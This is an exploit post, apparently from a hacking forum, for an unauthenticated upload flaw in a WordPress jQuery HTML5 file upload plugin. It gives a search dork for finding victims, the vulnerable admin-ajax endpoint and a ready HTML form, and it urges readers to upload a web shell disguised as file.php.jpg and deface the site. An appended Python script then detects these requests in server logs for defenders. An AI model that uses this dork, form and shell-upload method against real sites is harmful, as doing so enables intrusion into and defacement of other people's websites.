Wordpress Plugins jQuery Html5 File Upload Vulnerability
#################################################################################
# Wordpress Plugins jQuery Html5 File Upload Vulnerability | CSRF
# Author : Akbar Dravinky
# Google Dork: inurl:/wp-content/plugins/jquery-html5-file-upload/
# Tested on: Win 7, Linux
#
#################################################################################
# [!] Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function
# [!] File Location : http://127.0.0.1/wp-content/uploads/files/guest/file.php.jpg
First, look for a target using the dork above.
Signs that it is vulnerable:
Then just go to the CSRF form.
Upload the shell with the extension file.php.jpg
#[*] CSRF:
#################################################################################
<html>
<body>
<form method="POST" action="http://127.0.0.1/wp-admin/admin-ajax.php?action=load_ajax_function" enctype="multipart/form-data">
  <input type="file" name="files[]" /><button>Upload</button>
</form>
</body>
</html>
#################################################################################
Now look at the image above: my shell has been uploaded, bro, all that is left is to access it.
Example:
http://target.co.li/wp-content/uploads/files/guest/file.php.jpg
See, it's uploaded. Easy, right?
All that is left is to upload your own deface script :v
Thank you >_<
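
For defenders, the two requests in the post (the POST to admin-ajax.php?action=load_ajax_function and the fetch of a file under /wp-content/uploads/files/guest/) can be searched for in web server access logs. The following Python is an added example, not part of the original post; it assumes Combined Log Format, and the extension list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Indicators from the post: the AJAX action posted to and the upload directory.
UPLOAD_ACTION = "load_ajax_function"
GUEST_DIR = "/wp-content/uploads/files/guest/"
# Script extension anywhere in the file name, e.g. file.php.jpg (assumed list).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, finding) for a request matching either indicator, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path)  # decode %2e etc. before matching
    actions = parse_qs(url.query).get("action", [])
    if method == "POST" and path.endswith("/wp-admin/admin-ajax.php") \
            and UPLOAD_ACTION in actions:
        return ip, "upload-post"
    name = path.rsplit("/", 1)[-1]
    if GUEST_DIR in path and status == "200" and SCRIPT_EXT.search(name):
        return ip, "script-fetch"
    return None

def correlate(lines):
    """Clients that posted to the upload action, then fetched a script-named file."""
    uploaders, hits = set(), []
    for line in lines:
        found = classify(line)
        if found is None:
            continue
        ip, finding = found
        if finding == "upload-post":
            uploaders.add(ip)
        elif ip in uploaders and ip not in hits:
            hits.append(ip)
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /wp-admin/admin-ajax.php?action=load_ajax_function HTTP/1.1" 200 85 "-" "-"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /wp-content/uploads/files/guest/file.php.jpg HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /wp-content/uploads/files/guest/photo.jpg HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.4 - - [10/Oct/2023:13:56:09 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "-"',
]
```

Any address returned by `correlate` is a lead for review of the files present in the guest upload directory, not proof of compromise on its own.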